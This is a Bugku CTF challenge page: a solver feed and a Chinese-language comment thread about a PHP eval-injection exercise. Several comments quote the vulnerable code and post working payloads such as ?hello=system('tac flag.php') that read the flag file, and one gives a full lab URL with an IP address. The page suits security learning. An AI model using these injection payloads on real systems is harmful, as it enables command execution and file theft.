评分(9)
解题动态
zaiden 攻破了该题 41分钟前
147258369bugku 攻破了该题 1小时前
fc221b 攻破了该题 1小时前
aqnox 攻破了该题 3小时前
kfdwty 攻破了该题 1天前
z791458703 攻破了该题 1天前
buxixi 攻破了该题 1天前
1720713439 攻破了该题 2天前
shbshb123 攻破了该题 2天前
18075013015 攻破了该题 2天前
dkwang 攻破了该题 2天前
Gsparrow 攻破了该题 2天前
wenbojia 攻破了该题 3天前
DOMAKE 攻破了该题 3天前
别偷我后场 攻破了该题 3天前
Ta7suya 攻破了该题 3天前
liyuanchao 攻破了该题 3天前
qweQWERT 攻破了该题 3天前
咔咔 攻破了该题 3天前
评论
xiao 4年前
举报
直接用?hello=file('flag.php'),var_dump()函数可以打印
wyx48046 4年前
举报
厉害!
Hiiro 4年前
举报
大佬大佬
test_ctf 4年前
举报
牛逼!
Hacker23 4年前
举报
http://114.67.246.176:10183/?hello=system('tac flag.php')
ZTyyds 3年前
举报
原理是什么啊???想了解一下
guoguo 4年前
举报
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
dsadscxzewq 4年前
举报
为啥用cat不行呢?
痕夕 4年前
举报
看不懂,求解,大佬
SwBack 4年前
举报
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
巨人肩膀上的矮子 3年前
举报
@dsadscxzewq cat是可以的,只不过在源代码里查看
dsadscxzewq 4年前
举报
为啥用cat不行呢?
BBBugku 4年前
举报
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
krystalll 4年前
举报
感谢
lurnco 4年前
举报
Too young Too simple
Discuze奇 4年前
举报
我的金币不太允许了呀。。。
lurnco 4年前
举报
可以创个小号做后面的题人?
1amer 4年前
举报
直接读文件吧
你听说过呆呆吗? 4年前
举报
只有我一个人知道bugku更新了吗
storn 4年前
举报
我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o